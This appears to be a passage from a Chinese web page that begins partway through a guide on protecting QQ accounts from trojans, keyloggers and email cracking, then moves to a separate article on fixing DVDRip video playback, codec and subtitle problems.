③在QQ所在的文件夹下，删除子文件夹中的OICQ2000.cfg文件，这样下次 启动QQ将只能使用“注册向导登录”，这将使“隐身穿墙术”失效。
3、对于木马：
这是目前最流行的盗号方式。
①安装杀毒软件和_blank”>防火墙，起用他们的实时监控功能，及时升级毒库。黑 基的QQV2004也是一款不错的QQ保护软件。
②不要随意浏览网友发来的网页。如果实在战胜不了你的好奇心，那你可 以先将IE的安全级别改为“高”，禁用IE中的ActiveX、活动脚本和文 件下载，然后再去浏览。当然你要是很精通网页编程的话，你也可以先 用一些能直接读取网页源代码的工具（电猫工作室就有一款不错的）读 出源代码，分析代码后再决定是否浏览。
③不要随意运行网友发来的文件。在资源管理器或我的电脑中，将“文件 夹” 选项中的“查看”设置成不隐藏已知文件扩展名。对发来的文件 进行病毒扫描，特别注意*.JPG.EXE的文件，十有八九都有问题。对于 winrar的自解压文件不要去双击解压，点鼠标右键选择“用winrar打开 …”。更高超一点的就是对.exe和.BMP的文件进行脱壳和用16进制编 辑器来分析，我想这些就不是一般的菜鸟能及的了。
④对于键盘记录工具，可以通过交换密码的输入顺序来迷惑它。如：123的 密码，我可以先输2，然后用鼠标将光标移到2的左边输1，最后将光标移 到2的右边输3，这样它就会误认为密码是213。记住一定要用鼠标移动光 标哦。还有一个方法就是你打开记事本，将密码写上，然后用“复制” “粘贴”将密码粘贴到输入框，这样还可以方便的使用中文密码哦。
⑤对于那些直接获取输入框中密码的木马，菜鸟能使用的的方法就是使用 升级了最新毒库的杀毒软件，用_blank”>防火墙阻止不明程序发送email，下网后 查找C盘中可疑的*.log、*log.txt文件并删除。当然老鸟们可能会使用 查杀木马的一般步骤，从系统进程、启动、注册表、系统文件等方面进 行彻底的查杀。熟悉ActiveX控件的，还可以做一个程序对向windows的 Edit控件发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查。
4、对注册QQ密码保护登记的Email破解
①使用复杂的email密码。
②QQ资料中的email不要与申请密码保护的email相同。
5、对于QQ本身的漏洞
这是目前成功率最高的攻击方式。
①临时的解决方法：将攻击者放入黑名单。
②根本的解决方式：及时下载软件补丁。

视频播放的新问题全面解析

宽带的普及使在线点播视频成为可能，宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度，受到很多影迷的欢迎。不过，由于这种格式需要编码支持，各种编码在不同的工作环境下表现不一，此外还需要字幕外挂工具等的协同工作，因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中，笔者就和大家来谈谈视频播放的新问题及其解决方法。

正确选择编码插件和播放软件

现在的AVI除了最老的Windows就支持的格式外，还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说，高版本Windows媒体播放器已经自动支持MPEG4格式，而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能，很多AVI文件播放时无法选择播放进度，或是选择播放进度后只有声音无图像；9.0版本对AVI格式兼容性要求过高，编码稍微错误的AVI文件就无法播放。

以笔者的经验，用Divx5.1+Xvid+AC3解码（这些插件都可在Shooter.com.cn找到）是最佳组合。建议不要装FFSHOW这类号称一专多能的插件，有时会遇到播放时只有声音，图像变成一大块青色或粉红色块的问题。此外，各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题，卸载后再安装Divx5.1+Xvid+ AC3，也未必能恢复正常，你可能需要重新安装操作系统。

至于播放软件，由于至今也没一个兼容所有文件格式的软件，因此建议的组合是Windows媒体播放器+第三方播放软件（如金山影霸2003、WinDVD等）。Windows媒体播放器用来播放ASF、WMV等格式的文件，第三方播放软件用来播放RM等其他格式的文件。

正确处理字幕问题

1． 挑选中文字幕

绝大多数DVDRip视频都采用外挂字幕的形式，字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕，本质还是一串图形，需要IDX文件的支持；SRT和SSA 则是文字格式的字幕，只需要单独一个文件即可使用，文件一般仅有几十KB，便于传播。外挂的字幕文件往往不是纯中文的，有时有英文和中文甚至日文、法文等多种选择，默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能，可能会出现无法正确选择中文字幕的现象。因此，我们应该安装VobSub这个专门的字幕文件工具。

VobSub除了能在播放时自动打开字幕文件外，还具备选择字幕类型的功能。安装VobSub后，播放DVDRip格式的AVI文件时，我们会在任务栏的系统托盘区看见绿色的小图标，用鼠标双击这个小图标打开如图所示的对话框，在“Main”选项卡下的“language”下面，我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样，而big5、traditional Chinese等则是繁体中文字幕。需要注意的是，字幕文件名称必须和视频文件名称一致，否则播放视频文件时VobSub不会自动播放字幕文件。


2． 解决字幕不同步的问题

由于DVDRip可能是由不同组织用不同的DVD版本做出来的，因此可能会出现字幕不同步的情况。在VobSub中，我们可以切换到“Timing”选项卡，调整第一个对话框中的数值，数值越大，字幕出现的速度就越快，反之则越慢。自己慢慢揣摩适当的比例吧。当然，如果字幕和对白相差太远，建议大家去下载适合当前DVDRip版本的字幕文件。

提示：字幕改了Timing后，应该重新启动播放软件。如果只是暂时停止了播放，可能会发生程序响应极慢或者是死机的现象。


视频播放常见问题分析

不是所有视频文件安装好编码插件后就能一帆风顺地观看下去，有些视频文件源文件亮度就不够，或是用户的显示器使用时间太长，亮度已经下降很多，在这些情况下需要手工调节播放的亮度。

1． 亮度调节、截图等问题

如果你用的是Windows媒体播放器8.0以上版本，可以在播放视频文件时单击“查看→正在播放工具→视频设置”，然后拖动相应的滑块调整画面亮度及色彩等选项（如图）。如果是使用《金山影霸2003》，在播放的时候把鼠标指针移动到屏幕最顶端，就会出现亮度、对比度及色彩的调节选项。当然，你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。


视频文件的截图相对来说比较容易，但由于视频画面是通过DirextX输出的，因此用键盘上的Print Screen功能键无法截取视频画面，我们需要用版本较高的第三方抓图工具，如HyperSnap 4、SnagIt 6等等。

2． 画面倒转了怎么办

有些特殊编码的文件在播放时可能会出现画面倒转的问题（如图2），也有可能是由于该文件没有字幕文件造成的：我们可以把其他文件的字幕复制到这个目录，然后把名称改成相同的，再按上面的操作将字幕出现的速度调快一些，一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题：假如我们用的是《金山影霸2003》，可以在播放画面上单击鼠标右键，选择“图像翻转播放”。如果你用的是Windows媒体播放器，且已经开启了VobSub，可以用鼠标右键单击任务栏上系统托盘区的绿色箭头，选择“Flipped Picture”命令即可。

3． 轻松播放RMVB格式文件

我们可以将RMVB格式文件的后缀直接改为RM，当作RM格式来播放。如果更改文件后缀名后无法正确播放，可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包，安装后就可以直接播放RMVB文件了。

最后要提醒大家的是，最新的软件和编码不一定效果最好，有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持，对于必须要Windows Media Player 9才能播放的影片，笔者的建议是安装多操作系统，各自安装不同的播放软件。此外，大家可以多关注射手网（Shooter.com.cn），那上面有最新的编码插件和播放软件。